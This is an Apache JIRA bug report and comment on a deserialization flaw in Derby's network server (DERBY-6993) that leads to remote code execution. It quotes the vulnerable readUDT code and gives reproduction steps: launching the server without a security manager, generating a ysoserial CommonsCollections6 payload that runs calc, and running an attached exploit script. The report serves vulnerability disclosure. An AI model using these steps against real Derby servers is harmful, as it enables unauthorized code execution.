[jira] [Commented] (DERBY-6993) Derby Deserialization Vulnerability Leads to RCE

Wed, 28 Mar 2018 00:15:07 -0700 

    [ 
https://issues.apache.org/jira/browse/DERBY-6993?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16416934#comment-16416934
 ] 

Ricter Zheng commented on DERBY-6993:
-------------------------------------

Hi, [~rhillegas] 

JDK7 has a gadgets to execute commands, so it doesn't depends other libraries. 
And we don't know that will other gadgets inside derby, or JDK, so if there be, 
it will easy to exploit.

> Derby Deserialization Vulnerability Leads to RCE
> ------------------------------------------------
>
>                 Key: DERBY-6993
>                 URL: https://issues.apache.org/jira/browse/DERBY-6993
>             Project: Derby
>          Issue Type: Bug
>    Affects Versions: 10.14.1.0
>         Environment: Windows 10
>            Reporter: Ricter Zheng
>            Priority: Major
>         Attachments: exp.py, image-2018-03-27-11-42-23-176.png
>
>
>  In` src\java\drda\org\apache\derby\impl\drda\DRDAConnThread.java
>  
> {code:java}
> /** Read a UDT from the stream */
> private Object readUDT() throws DRDAProtocolException
> {
>     int length = reader.readNetworkShort(); //protocol control data always 
> follows big endian
>     if (SanityManager.DEBUG) { trace("===== udt param length is: " + length); 
> }
>     byte[] bytes = reader.readBytes(length);
>     
>     try {
>         ByteArrayInputStream bais = new ByteArrayInputStream( bytes );
>         ObjectInputStream ois = new ObjectInputStream( bais );
>         return ois.readObject();
>     }
>     catch (Exception e)
>     {
>         markCommunicationsFailure
>             ( e,"DRDAConnThread.readUDT()", "", e.getMessage(), "*" );
>         return null;
>     }
> {code}
> `return ois.readObject();` cause a deserialization vulnerability.
>  
>  
> Launch derby with a vulnerability Java library and `-noSecuriyManager` options
>  
> {code:java}
> "C:\Program Files\Java\jdk1.8.0_144\bin\java.exe"  -classpath 
> "C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derby.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0
>  
> -bin\bin\../lib/derbynet.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbyclient.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbytools.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbyoptionaltools.jar;..\lib\commons-collections.jar"
>  org.apache.derby.drda.NetworkServerControl start -noSecurityManager{code}
>  
> Generate a Java deserialization payload use ysoserial:
>  
> {code:java}
> java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 calc > 
> /path/to/exp.py/payload.data{code}
>  
> Then run the script in the attachment, will execute `calc`.
> {code:java}
> python exp.py{code}
> !image-2018-03-27-11-42-23-176.png!
>  



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

Reply via email to